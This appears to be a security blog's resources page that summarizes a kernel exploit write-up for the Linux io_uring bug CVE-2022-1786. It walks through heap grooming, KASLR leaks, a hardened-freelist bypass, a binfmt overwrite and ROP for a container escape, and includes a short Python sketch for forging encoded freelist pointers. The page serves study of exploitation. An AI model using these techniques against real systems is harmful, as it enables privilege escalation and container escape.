Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

A Journey To The Dawn - CVE-2022-1786 - 983

KyleBot - Posted 3 Years Ago
  • io_uring is a new subsystem in the Linux kernel used for speedy IO operations. Normally, a program may need to make privilege transitions many times via syscalls, one per IO operation. With io_uring, a series of IO operations can instead be submitted together and performed in parallel.
  • Rapid development == more bugs though. Complex code with a ton of asynchronous operations tends to have security bugs as well. Additionally, many bugs within io_uring have been used to break out of the Container-Optimized OS run by kCTF, making this a good attack surface for the author.
  • When the function io_req_init_async is called, it assigns its own identity to be the worker of the IO request. However, if two threads submit an IO request to the same io_uring at the same time, then they will be attached to the same work queue but with different IDs. The fact that the same identity is used for two different requests is what causes the very subtle security issue.
  • If one of the threads exits, then the IO events are all reaped. In this process, the exiting thread's identity gets assigned instead of the request submitter's. Why does this matter? One part of the code uses this as a heap object and the other uses this as a pointer to the middle of a structure. Aka, we have a type confusion creating an invalid free.
  • How exploitable is this? Because of CONFIG_HARDENED_USERCOPY (which is enabled on the Container-Optimized OS), the function used to copy data from userland (copy_from_user) cannot be used across slot boundaries. So, the typical method of placing a msg_msg there and corrupting it will not work. It's possible to spray this area with objects we don't own, but it's not trivial.
  • What's the strategy then? Allocate the victim object in an invalid slot (between two slots), then use the other parts of the slot (upper and lower) to corrupt it. The object timerfd_ctx is within the kmalloc-256 slot and has plenty of pointers, making it a prime target for exploitation within our fake slot. From the fake slot, the author decided to use the upper and lower slots with the msg_msgseg object, which has mostly user-controlled data.
  • Once the heap feng shui is done, we can get the information leak from the object. First, the linked list within timerfd_ctx points back to itself (heap), leading to a nice leak from the msg_msgseg object. For breaking KASLR, arming the timer will set a function pointer which points to the .text section.
  • Hijacking code execution is easy via the function pointer within the timer, but this leads to a ton of issues. So, they decided to free the timer and attack the allocator's freelist instead. The CONFIG_SLAB_FREELIST_HARDENED flag is turned on, which is a type of pointer encoding that requires us to know the storage address of the pointer, a random value and the new pointer itself. By filling up the entire slab, we can force the ptr to be NULL, leak its encoded form and calculate the random value to write the pointer ourselves.
  • By hijacking the freelist, we now have a completely functional arbitrary write primitive. Since they wanted a container escape (and more money), they targeted the way Linux loads executables via binfmt. The structures used for loading executables are writable! Using the primitive from above, the load_binary callback function can be abused to get PC control to ROP.
  • Game over, right? This worked on the author's machine but not the kCTF machine - the only writable part of the system was tmpfs, which was not compatible with the exploit, because the exploit needed the O_DIRECT file flag. Only a few files could be opened with this flag in the container and they were all very small, making the exploit unreliable.
  • After playing with the heap feng shui and the freelist, they decided to go with a different strategy. They used the timerfd_ctx to ROP instead. Using this, the same controlled binfmt overwrite could be used to get code execution. Another novel technique was to call msleep to gracefully end the ROP chain in the interrupt context so that the program does not crash.
  • Amazing article! Great background, nice references and I love the ups & downs included in the article. The thought process behind every decision is very clear, regardless of whether the thing worked or not. Great exploit and definitely worth the 90K from Google.
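
The freelist step in the notes above (leak an encoded NULL, recover the random value, then write our own pointer) can be sketched with plain arithmetic. This is a minimal sketch, not the author's exploit code: it assumes the hardened freelist pointer is stored as ptr XOR random XOR byte-swapped storage address, which is my understanding of recent mainline SLUB, and the exact encoding may differ between kernel versions. All function names and addresses here are hypothetical and only for illustration.

```python
MASK64 = (1 << 64) - 1


def swab64(value: int) -> int:
    """Reverse the byte order of a 64-bit value."""
    return int.from_bytes((value & MASK64).to_bytes(8, "little"), "big")


def encode_freelist_ptr(ptr: int, ptr_addr: int, random_value: int) -> int:
    """ASSUMED encoding: ptr ^ random ^ swab(storage address)."""
    return (ptr ^ random_value ^ swab64(ptr_addr)) & MASK64


def decode_freelist_ptr(encoded: int, ptr_addr: int, random_value: int) -> int:
    """XOR is its own inverse, so decoding repeats the same operation."""
    return encode_freelist_ptr(encoded, ptr_addr, random_value)


def recover_random(leaked_encoded_null: int, ptr_addr: int) -> int:
    """If the stored pointer is NULL, the leak is random ^ swab(addr)."""
    return (leaked_encoded_null ^ swab64(ptr_addr)) & MASK64


def forge_freelist_ptr(target: int, ptr_addr: int, random_value: int) -> int:
    """Build the value to write so the allocator decodes it to `target`."""
    return encode_freelist_ptr(target, ptr_addr, random_value)


if __name__ == "__main__":
    # Hypothetical values, chosen only to exercise the arithmetic.
    secret = 0x1122334455667788          # per-cache random value (unknown to us)
    slot_addr = 0xFFFF888012345600       # where the freelist pointer is stored
    target = 0xFFFFFFFF82000000          # address we want the allocator to return

    leak = encode_freelist_ptr(0, slot_addr, secret)   # last free object: next == NULL
    recovered = recover_random(leak, slot_addr)
    forged = forge_freelist_ptr(target, slot_addr, recovered)

    print(hex(recovered))
    print(hex(decode_freelist_ptr(forged, slot_addr, secret)))
```

The point of the sketch is that the random value is only secret while every term in the XOR is unknown. Once the slab is full and the next pointer is NULL, a heap leak (the storage address) plus a read of the encoded value is enough to recover it.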